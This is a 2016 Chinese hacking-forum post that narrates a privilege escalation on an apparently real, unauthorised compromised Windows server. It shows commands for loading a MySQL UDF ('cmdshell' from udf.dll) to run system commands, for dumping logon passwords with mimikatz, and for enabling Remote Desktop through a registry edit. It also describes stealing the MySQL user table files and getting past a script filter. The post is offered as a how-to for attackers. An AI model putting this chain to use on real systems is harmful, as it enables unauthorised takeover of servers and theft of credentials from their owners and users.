搜索
查看: 710|回复: 0

一次提权过程

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2016-6-2 00:23:22 | 显示全部楼层 |阅读模式
今天看老大提权,在一旁偷学了几招,闲着无聊分享给大家,希望能喜欢。
aspx+mssql+2008 不是sa用户
[/url]
看到3306端口,尝试udf提权
翻了翻网站目录没有找到root用户
然后发现这个目录有读的权限,于是下载user.frm .user.MYD user.MYI 到本地
[url=http://static.wooyun.org/upload/image/201606/2016060120422885328.png]

放到test数据库里进行查询
[/url]
[url=http://static.wooyun.org/upload/image/201606/2016060120460919980.png]

这时候蛋疼的事情发生了,php脚本一旦出现 phpinfo() eval() mysql_connect()等这类敏感函数,服务器就会返回500,又不能外联,弹了shell回来和本地交互也不能进入到mysql,aspx连接mysql提示未安装什么模块。
老大就是老大姿势要多YD有多YD,通过mysql-e参数 在cmd下执行数据库语句。
[/url]
上传可爱的udf,因为权限不够所以需要通过mysql导出到\lib\plugin 这个目录下
[url=http://static.wooyun.org/upload/image/201606/2016060121082813985.png]

[/url]
创建函数
  1. create function cmdshell returns string soname 'udf.dll';
复制代码
执行命令
select cmdshell('whoami');
[url=http://static.wooyun.org/upload/image/201606/2016060121122220704.png]

下面就不截图了  体力活!!!
然后就是上传神器mimikatz抓取hash
  1. mimikatz privilege::debug sekurlsa::logonpasswords
复制代码
查看远程桌面端口
  1. reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\Tcp" /v PortNumber
复制代码
没有打开的话可以通过注册表打开3389

  1. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
您可以更新记录, 让好友们知道您在做什么...
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表